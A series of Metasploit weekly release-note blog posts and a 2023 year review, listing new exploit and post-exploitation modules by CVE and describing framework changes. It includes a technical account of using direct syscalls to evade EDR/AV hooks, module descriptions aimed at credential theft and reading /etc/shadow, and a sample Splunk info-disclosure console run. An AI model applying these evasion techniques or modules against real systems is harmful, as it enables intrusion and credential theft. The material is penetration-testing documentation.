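end
```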

New module content (3)

runc (docker) File Descriptor Leak Privilege Escalation

Authors: Rory McNamara and h00die
Type: Exploit
Pull request: #18780 contributed by h00die
Path: linux/local/runc_cwd_priv_esc

Description: This adds a local privilege escalation exploit that leverages an internal file descriptor leak in runc versions prior to 1.1.12. An attacker with docker privileges is able to write an arbitrary file on the host file system with the permissions of runc (typically root). With this, the module uploads a payload and sets the execute and SUID permissions to escalate privileges.

Cacti RCE via SQLi in pollers.php

Authors: Aleksey Solovev and Christophe De La Fuente
Type: Exploit
Pull request: #18769 contributed by cdelafuente-r7
Path: multi/http/cacti_pollers_sqli_rce

Description: This PR adds an exploit module which leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE.

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

Authors: James Horseman, Zach Hanley, and sfewer-r7
Type: Exploit
Pull request: #18762 contributed by sfewer-r7
Path: multi/http/fortra_goanywhere_mft_rce_cve_2024_0204

Description: This pull request adds an exploit module for CVE-2024-0204 which is a path traversal vulnerability which results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

Enhancements and features (3)

  • #18696 from zgoldman-r7 – Introduces a standalone MSSQL client class that can be used in new contexts not tied to a specific module.
  • #18718 from cgranleese-r7 – Updates the auxiliary/scanner/mysql/mysql_login.rb module to include a new CreateSession option that opens an interactive session. This functionality is currently behind a feature flag which can be enabled with features set mysql_session_type true.
  • #18761 from dwelch-r7 – Adds a user notification that new modules support a CreateSession option. This functionality is currently behind a feature flag which can be enabled with the features command.

Bugs fixed (3)

  • #18704 from dwelch-r7 – Fixes a bug with framework having 0 registered nop modules when the defer-module-loads feature was enabled.
  • #18773 from sjanusz-r7 – Fixes an issue where Ctrl+Z and Ctrl+C did not work correctly in the context of an interactive PostgreSQL shell prompt inside the PostgreSQL session type.
  • #18803 from dwelch-r7 – Fixes a crash when using exploit/multi/handler with an invalid payload name.

Documentation added (1)

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/02/2024

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2024/02/02/metasploit-weekly-wrap-up-02-02-2024/

Shared RubySMB Service Improvements

This week’s updates include improvements to Metasploit Framework’s SMB server implementation: the SMB server can now be reused across various SMB modules, which are now able to register their own unique shares and files. SMB modules can also now be executed concurrently. Currently, there are 15 SMB modules in Metasploit Framework that utilize this feature.

New module content (2)

Mirth Connect Deserialization RCE

Authors: Naveen Sunkavally, Spencer McIntyre, and r00t
Type: Exploit
Pull request: #18755 contributed by zeroSteiner
Path: multi/http/mirth_connect_cve_2023_43208

Description: This PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679, where the former is a patch bypass for the latter. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget. A technical analysis of CVE-2023-37679 is available in AttackerKB.

Puppet Config Gather

Author: h00die
Type: Post
Pull request: #18628 contributed by h00die
Path: linux/gather/puppet

Description: This PR adds a post gather module to get Puppet configs and other sensitive files.

Enhancements and features (2)

  • #18680 from zeroSteiner – This adds a service compatible with Rex::ServiceManager for SMB that can be shared among modules.
  • #18742 from sjanusz-r7 – Enhances the post/multi/gather/memory_search with additional UX improvements such as outputting a list of matched processes that are being targeted, as well as improved error handling if the process architecture is not correct.

Bugs fixed (2)

  • #18750 from adfoster-r7 – Updates the to_handler command for payload modules to support option overrides. The to_handler command is a convenient way of using multi/handler, setting the payload, and setting datastore options.
  • #18760 from adfoster-r7 – Fixes an issue where Metasploit fails to start when resolv.conf cannot be found.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/26/24

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/01/26/metasploit-weekly-wrap-up-01-26-24/

Direct Syscalls Support for Windows Meterpreter

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API’s. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is finding the correct syscall number, since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used here relies on the assumption that syscall numbers are assigned sequentially, starting from 0, in the same order as the native API stubs are laid out in memory, so the syscall number can be deduced from the position of the related function. The technique consists of selecting the system call functions (Zw…) from the ntdll.dll exports and sorting them in ascending order of their memory addresses; the syscall number of a given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo’s Gate.

Another improvement is to make sure the call to the syscall instruction is made from within ntdll.dll: EDR/AV can monitor this and flag any system call not issued from ntdll.dll as suspicious. This technique is taken directly from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from Windows XP to the most recent releases. The implementation takes care of parsing ntdll.dll and obtaining the correct trampoline address that is used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module.

Authors: DZONERZY, Unknown, and h00die-gr3y
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication bypass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445), allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps utilizing Apache Commons Text’s (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

  • #17634 from adfoster-r7 – Reliability and stability notes that have been previously missing have been added to some modules.
  • #18645 from jvoisin – This adds a way to get the Build ID from ld.so by using the ‘perf’ command. Before this change, the module depended on the ‘file’ and ‘readelf’ commands being installed to get the Build ID.
  • #18663 from sjanusz-r7 – Adds a new Postgres session type, which is currently behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:[email protected]:9000/template1 createsession=true verbose=false.
  • #18720 from zeroSteiner – This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad characters when using the new fetch payloads.
  • #18735 from AleksaZatezalo – Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
  • #18737 from zeroSteiner – This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

  • #18662 from dwelch-r7 – Fixes an edgecase where features set dns_feature true did not correctly parse a user’s /etc/resolv.conf file if there were multiple nameservers present.
  • #18712 from ekalinichev-r7 – Fixes a crash with Metasploit’s REST api when calling /api/v1/modules?name=aux.
  • #18746 from zeroSteiner – Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module’s datastore would be unintentionally updated with the new option value.

Documentation added (1)

  • #18729 from poupapaa – This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/19/24

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2024/01/19/metasploit-weekly-wrap-up-01-19-24/

Unicode your way to a php payload and three modules to add to your playbook for Ansible

Our own jheysel-r7 added an exploit leveraging the fascinating tool of PHP filter chaining to prepend a payload using encoding conversion characters, and h00die et al. have come through and added 3 new Ansible post modules to gather configuration information, read files, and deploy payloads. While none offer instantaneous answers across the universe, they will certainly help in red team exercises.

New module content (4)

Ansible Agent Payload Deployer (1 of 3 Ansible post modules)

Authors: h00die and n0tty
Type: Exploit
Pull request: #18627 contributed by h00die
Path: linux/local/ansible_node_deployer

Ansible Config Gather (2 of 3 Ansible post modules)

Author: h00die
Type: Post
Pull request: #18627 contributed by h00die
Path: linux/gather/ansible

Ansible Playbook Error Message File Reader (3 of 3 Ansible post modules)

Authors: h00die and rioasmara
Type: Post
Pull request: #18627 contributed by h00die
Path: linux/gather/ansible_playbook_error_message_file_reader

Description: This adds 3 post-exploitation modules for Ansible. The config gather module collects Ansible information and configuration. The playbook error message file reader exploits an arbitrary file read that enables an attacker to read the first line of a file (typically /etc/shadow) when the compromised account is configured with password-less sudo permissions. The node deployer is an exploit that can deploy a payload to all the nodes in the network.

WordPress Backup Migration Plugin PHP Filter Chain RCE

Authors: Nex Team, Valentin Lobstein, and jheysel-r7
Type: Exploit
Pull request: #18633 contributed by jheysel-r7
Path: multi/http/wp_backup_migration_php_filter

Description: This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.

Enhancements and features (2)

  • #18596 from dwelch-r7 – Updates multiple SMB modules to work with the new upcoming SMB session type support. This beta functionality is currently behind a feature flag, and can be enabled with features set smb_session_type true.
  • #18682 from adfoster-r7 – Add tests for Msf::Exploit::Local module types to ensure that sysinfo will not break again in the future.

Bugs fixed (2)

  • #18655 from adfoster-r7 – Ensures the module will automatically be used when the hierarchical search functionality is enabled and only one module result is found.
  • #18710 from adfoster-r7 – Fixes an uninitialized constant Msf::Simple::Exploit::ExploitDriver exception that could sometimes occur when running Metasploit framework’s payload modules.

Documentation added (1)

  • #18702 from Sh3llSp4wn – Updates the documentation for the private and public fields in lib/metasploit/framework/credential.rb to be correct.

You can always find more documentation on our docsite at docs.metasploit.com.

Missing rn-* label on Github (1)

  • #18398 from errorxyz – Fixes deprecation warnings when running the auxiliary/admin/scada/modicon_password_recovery, auxiliary/scanner/lotus/lotus_domino_hashes, auxiliary/sniffer/psnuffle, exploits/unix/webapp/vbulletin_vote_sqli_exec exploit modules with a database connected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/12/24

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2024/01/12/metasploit-weekly-wrap-up-01-12-24/

New module content (1)

Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor

Author: Pasquale ‘sid’ Fiorillo
Type: Post
Pull request: #18604 contributed by siddolo
Path: windows/gather/credentials/winbox_settings

Description: This pull request introduces a new post module to extract the Mikrotik Winbox credentials, which are saved in the settings.cfg.viw file when the "Keep Password" option is selected in Winbox.

Enhancements and features (7)

  • #18515 from errorxyz – This PR adds a Java target for the ManageEngine ServiceDesk Plus exploit CVE-2022-47966 using the payload mentioned in this blogpost and deletes the log file that records the error due to the exploit to make it more stealthy.
  • #18672 from h00die – Fix spelling mistakes in Metasploit’s library folder.
  • #18673 from h00die – Fix spelling mistakes in Metasploit’s scripts folder.
  • #18674 from h00die – Fix spelling mistakes in Metasploit’s plugins folder.
  • #18675 from h00die – Fix spelling mistakes in Metasploit’s tools folder.
  • #18679 from h00die – Fix spelling mistakes in Metasploit’s auxiliary modules.
  • #18691 from zeroSteiner – Metasploit console now requires an installed version of apktool greater than or equal to v2.9.2.

Bugs fixed (5)

  • #18656 from dwelch-r7 – Enforces all modules to be loaded as part of reload_all when the defer_module_loads feature is enabled.
  • #18666 from zeroSteiner – Fixes a crash when running the save command to save Metasploit’s configuration.
  • #18667 from zeroSteiner – Re-adds the #sysinfo instance method for sessions.
  • #18669 from sjanusz-r7 – Updates the favorites command to no longer output an empty message when a chosen module does not have custom datastore values available.
  • #18690 from sjanusz-r7 – Ensures that a target’s default payload is correctly chosen when selecting a module from the search command.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 1/05/2024

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2024/01/05/metasploit-weekly-wrap-up-40/

New module content (2)

Splunk __raw Server Info Disclosure

Authors: KOF2002, h00die, and n00bhaxor
Type: Auxiliary
Pull request: #18635 contributed by n00bhaxor
Path: gather/splunk_raw_server_info

Description: This PR adds a module for an authenticated Splunk information disclosure vulnerability. This module gathers information about the host machine and the Splunk install including OS version, build, CPU arch, Splunk license keys, etc.

[msf](Jobs:0 Agents:0) > use auxiliary/gather/splunk_raw_server_info 
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set username admin
username => admin
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set password splunksplunk
password => splunksplunk
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set verbose true
verbose => true
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > run
[*] Running module against 127.0.0.1
[+] Output saved to /root/.msf4/loot/20231220204049_default_127.0.0.1_splunk.system.st_943292.json
[+] Hostname: 523a845e8652
[+] CPU Architecture: x86_64
[+] Operating System: Linux
[+] OS Build: #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09)
[+] OS Version: 6.5.0-kali3-amd64
[+] Splunk Version: 7.1.0
[+] Trial Version?: false
[+] Splunk Forwarder?: false
[+] Splunk Product Type: splunk
[+] License State: OK
[+] License Key(s): ["FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"]
[+] Splunk Server Roles: ["indexer", "license_master"]
[+] Splunk Server Startup Time: 2023-12-21 01:40:02
[*] Auxiliary module execution completed

Craft CMS unauthenticated Remote Code Execution (RCE)

Authors: Thanh, chybeta, and h00die-gr3y
Type: Exploit
Pull request: #18612 contributed by h00die-gr3y
Path: linux/http/craftcms_unauth_rce_cve_2023_41892

Description: This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.

Enhancements and features (2)

  • #18610 from sjanusz-r7 – This PR enables the Metasploit Payload Warnings feature by default. When enabled, Metasploit will output warnings about missing Metasploit payloads, for instance if they were removed by antivirus.
  • #18632 from jvoisin – This PR adds improvements to the Glibc Tunables Privilege Escalation module. In the event the file command is not present on the target the module will try to use the readelf command to get the ld.so build ID and determine whether or not the target is compatible with the exploit.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit 2023 Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/12/29/metasploit-2023-wrap-up/

As 2023 winds down, we’re taking another look back at all the changes and improvements to the Metasploit Framework. This year marked the 20th anniversary since Metasploit version 1.0 was committed and the project is still actively maintained and improved thanks to a thriving community.

Version 6.3

Early this year in January, Metasploit version 6.3 was released with a number of improvements for targeting Active Directory environments. The crowning achievement of this effort was the integration of native Kerberos authentication. With this in place, HTTP, LDAP, MSSQL, SMB and WinRM modules can all make use of Kerberos authentication, enabling a swath of new attack techniques and workflows. In addition to the existing modules that are now capable of authenticating with Kerberos, multiple Kerberos-specific modules were added as well for a variety of tasks such as requesting tickets from the Key Distribution Center (aka the KDC which is almost always the Active Directory Domain Controller), forging tickets from known secrets, and inspecting the contents of tickets.

This functionality was highlighted in Black Hat USA’s Arsenal demonstrations, a recording of which can be found online.

Fetch Based Payloads

In May 2023, Metasploit released a new set of payloads, dubbed the Fetch Payloads which make exploitation of OS-command-executing vulnerabilities easier for users. At the time of the release, about two-thirds of exploits added to the Metasploit Framework in the previous year resulted in the execution of an OS command, either due to direct injection or via some other means such as deserialization. While OS command execution is becoming more popular, it often limits the type of payloads that can easily be added to an exploit since the most advanced payloads, including Meterpreter, aren’t available as OS commands.

Prior to the Fetch Payloads, exploit authors were burdened with the work necessary to convert Meterpreter payloads to something deliverable as an OS command. This led to extra work and inconsistent implementations that often lacked the flexibility our users desire. The new pattern uses the Fetch Payloads, which allows the Framework to handle this automatically. The result is less work for exploit developers and a higher degree of control for end users. We expect to see Fetch Payloads continue to be used widely well past 2024 and to have new variants added.

Even More Kerberos Improvements

While the Metasploit 6.3 release provided support for native Kerberos authentication for Metasploit, we’ve since built on it to add even more. These features didn’t make it into the original 6.3 release in January but have since shipped in weekly releases:

  • The auxiliary/admin/kerberos/forge_ticket module was expanded to support the diamond and sapphire techniques in addition to the original golden and silver techniques.
  • The auxiliary/admin/kerberos/forge_ticket module was also updated to account for the additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
  • We added the post/windows/manage/kerberos_tickets post module, which enables users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
  • The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Fewer DNS Leaks

One of the best features of Metasploit is the seamless way in which users can use established Meterpreter and SSH sessions to tunnel traffic as configured by the route command or often the post/multi/manage/autoroute module. Until this year, these connections would resolve hostnames to IP addresses from the system on which the Metasploit Framework was running, which could potentially leak information to listening parties. Thanks to a combined effort by sempervictus and smashery, Metasploit can now be configured to use a custom DNS server that is optionally accessed via an established session. This feature is currently behind a feature flag and requires users to run features set dns_feature true before it can be accessed.

Once enabled, the dns command allows users to configure how they would like to resolve DNS hostnames. Users can simply specify a single server to handle all queries, or use a wildcard syntax to send DNS queries for one domain to a specific server and non-matching queries to another. The weekly wrap up for the original release contains more detailed notes and usage examples.

Discoverability Improvements

A more recent change to the Framework brought a new feature to allow searching for more fields within modules. By enabling hierarchical search with features set hierarchical_search_table true, users will now find search queries that match module actions, targets, and AKA aliases. For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to be included in the search results when forge_golden is the query because forging golden tickets is one of the actions that it supports.

Users can also discover new capabilities and how to use them by browsing our new docs site at docs.metasploit.com. This site’s source code is included within Metasploit itself, making it easy for users to contribute improvements and their own workflows.

Payload Improvements

Exploits are at the core of what we do on the Metasploit team, but they would be nothing without our payloads. This year saw multiple improvements to our payloads — some changes closed feature gaps, while others added net new functionality. Some highlights include:

  • Smashery updated our Java Meterpreter payloads with an important fix to the loader to enable compatibility with the latest versions of OpenJDK.
  • Salu90 added a new API to the Windows Meterpreter and a post module to use it that allows users to set the session’s token to a new value.
  • JustAnda7 updated the Windows Meterpreter to display IPv6 routes for inspection when the user runs the Meterpreter route command (not to be confused with the Framework route command).
  • Ishaanahuja7 added support to Meterpreter for running natively on Apple’s new ARM-based chips.
  • Sempervictus added native sessions for AWS Instance connections and AWS SSM agents. These session types are noteworthy because while they require access tokens, they do not require a payload to be run on the target and can be used to open a session on a target that Metasploit is otherwise unable to communicate with.
  • usiegl00 and Ishaanahuja7 both contributed enhancements to add support for macOS AArch64 Meterpreter payloads, which enables the use of native payloads on M1 or M2 macOS devices that do not have Rosetta installed.

Additionally, GitHub Actions are now being used to measure the feature coverage of the Meterpreter API commands. It’s a lesser-known fact that the Meterpreter payload has multiple implementations for different architectures and platforms. This means some features may be present in one and not another. This is the reason the Mimikatz kiwi plugin isn’t available when the java/meterpreter/reverse_tcp payload is used. To help us and the community track this information, a report including a coverage matrix is now generated automatically. This report can be accessed by navigating to the project’s Actions tab, selecting “Acceptance”, the latest run, and finally downloading the “final-report”.

Module Highlights

  • CVE-2022-47966 – This particular vulnerability was an RCE in multiple ManageEngine products. A combined effort by cdelafuente-r7 and h00die-gr3y brought exploits for the ServiceDesk Plus, ADSelfService Plus, and Endpoint Central products.

  • CVE-2023-34362 (Exploit) – The MOVEit exploit leverages one of the more high-profile vulnerabilities to have been released this year. This module exploits a SQL injection to leak sensitive data in order to upload a .NET deserialization payload which results in code execution in the context of NT AUTHORITY\SYSTEM and was a combined effort by sfewer-r7, rbowes-r7, and bwatters-r7.

  • CVE-2023-32560 (Exploit) – This vulnerability is an unauthenticated RCE in Ivanti Avalanche MDM that would result in code execution as NT AUTHORITY\SYSTEM. The module was submitted by EgeBalci and is one of the very few memory corruption exploits added this year.

  • CVE-2023-46214 (Exploit) – Chocapikk made their first contributions this year, one of which is for an authenticated RCE in Splunk Enterprise.

  • CVE-2023-22952 (Exploit) – This exploit was contributed by community member h00die-gr3y back in January of 2023. While it may seem like old news nearly a year later, this zero-day gained a lot of attention when it first came to light. This exploit brought along with it new mixin capabilities for Metasploit to embed PHP payloads in PNG images. This opens the door for future exploit modules to drop payloads inside of PNGs with ease.

  • CVE-2023-20887 (Exploit) – This module was added by community contributor sinsinology (with help from community contributor h00die). There were a few Metasploit modules released this year that targeted VMware products; however this one stands out above the rest. Targeting the popular VMware Aria Operations for Networks software, this module enabled attackers to gain unauthenticated code execution in the context of the root user on a wide range of affected software versions.

  • CVE-2023-27350 (Exploit) – Speaking of modules written for celebrity vulnerabilities, let’s not leave out the PaperCut NG Authentication Bypass, brought to the framework by Metasploit’s one and only Christophe De La Fuente. Christophe’s contribution helped pen testers better assess the security of systems hosting PaperCut NG and ease the concerns of their clients during a stressful time in the cybersecurity ecosystem. The module exploits all affected versions of PaperCut NG and returns an elevated Meterpreter session.

  • Post Module – Written by Spencer McIntyre of the Metasploit team, this module highlights the framework’s new, powerful Kerberos capabilities. Bringing along with it a large amount of railgun enhancements this module allows for Kerberos tickets to be exported from a compromised host and added to Metasploit’s own cache, allowing them to be used in subsequent attacks. The Kerberos work along with this module helps streamline many different types of attacks that can be performed in and around Domain environments. If you haven’t tested Metasploit’s Kerberos authentication capabilities yet, put it at the top of your todo list for 2024!

  • CVE-2023-28252 (Exploit) – The Common Log File System (CLFS) driver is a fantastic vector for attacks; it’s installed on all the latest versions of Windows and saw more abuse in 2023. Ransomware gangs exploited this vulnerability to gain SYSTEM-level access on Windows 10, 11 and Server 2022. Metasploit team member Jack Heysel wrote this module, which uses the Reflective DLL template to drop a low-level PoC that returns a session running in the context of NT AUTHORITY\SYSTEM.

  • CVE-2023-40044 (Exploit) – Another exploit that made big waves this year targets a .NET deserialization vulnerability in the Ad Hoc Transfer module of WS_FTP Server. The module, and the initial research into how the vulnerability actually works, was brought to us by Metasploit’s very own veteran contributor, Stephen Fewer. The exploit module runs reliably on a wide range of affected targets. Everyone loves a module where all you have to do is select the module, input the IP address of the machine running the vulnerable software, run the module, and get a SYSTEM-level session.

Contributors

We would like to give a big thank you to all of the contributors who sent us code in 2023. Whether it was bug fixes, enhancements, or exploits, we appreciate the work you put into making Metasploit better. In 2023, we received pull requests from the following 75 people (ordered by count). Of these, 49 made their first contribution to Metasploit this year.

  • h00die
  • bcoles
  • smashery
  • h00die-gr3y
  • jmartin-tech
  • ErikWynter
  • EgeBalci
  • ismaildawoodjee (new in 2023)
  • wvu
  • jvoisin
  • sempervictus
  • rorymckinley (new in 2023)
  • rad10
  • manishkumarr1017 (new in 2023)
  • Ryuuuuu (new in 2023)
  • prabhatjoshi321 (new in 2023)
  • Chocapikk (new in 2023)
  • Jemmy1228 (new in 2023)
  • AleksaZatezalo (new in 2023)
  • emirpolatt (new in 2023)
  • heyder
  • steve-embling
  • dm-ct (new in 2023)
  • ide0x90
  • archcloudlabs
  • samsepi0x0 (new in 2023)
  • Lorenyx (new in 2023)
  • MikeAnast (new in 2023)
  • loredous (new in 2023)
  • bradyjackson (new in 2023)
  • nfsec
  • HynekPetrak
  • whotwagner (new in 2023)
  • rtpt-erikgeiser
  • errorxyz (new in 2023)
  • e-lliot (new in 2023)
  • gcarmix (new in 2023)
  • j0ev (new in 2023)
  • xaitax (new in 2023)
  • cudalac (new in 2023)
  • bka-dev
  • cnnrshd (new in 2023)
  • pbarry25 (new in 2023)
  • D00Movenok (new in 2023)
  • gardnerapp (new in 2023)
  • rodnt (new in 2023)
  • hahwul (new in 2023)
  • JustAnda7
  • Guilhem7 (new in 2023)
  • shellchocolat (new in 2023)
  • sdcampbell (new in 2023)
  • attl4s (new in 2023)
  • distortedsignal (new in 2023)
  • spmedia (new in 2023)
  • YiDa858 (new in 2023)
  • j-baines (new in 2023)
  • catatonicprime
  • vtoutain (new in 2023)
  • SubcomandanteMeowcos (new in 2023)
  • samueloph (new in 2023)
  • araout42 (new in 2023)
  • Pflegusch (new in 2023)
  • tekwizz123
  • rohitkumarankam (new in 2023)
  • jeffmcjunkin
  • MegaManSec
  • bugch3ck
  • raboof (new in 2023)
  • JBince (new in 2023)
  • Frycos (new in 2023)
  • neterum (new in 2023)
  • mkonda (new in 2023)
  • serializingme (new in 2023)
  • k0pak4
  • npm-cesium137-io
  • hamax97 (new in 2023)

Metasploit Weekly Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2023/12/22/metasploit-weekly-wrap-up-39/

Getting Looney with Privilege Escalation

As if Metasploit couldn’t get any loonier, this release adds a brand new exploit module for the glibc tunables privilege escalation, aka Looney Tunables. Using linux/local/glibc_tunables_priv_esc, you can check your target’s glibc version to see if it is vulnerable to the buffer overflow described in CVE-2023-4911. If so, the module drops a Python script that exploits it and returns a session running as the root user. Happy Tuning!

New module content (3)

Vinchin Backup and Recovery Command Injection

Authors: Gregory Boddin (LeakIX) and Valentin Lobstein
Type: Exploit
Pull request: #18542 contributed by Chocapikk
Path: linux/http/vinchin_backup_recovery_cmd_inject

Description: This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.

Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)

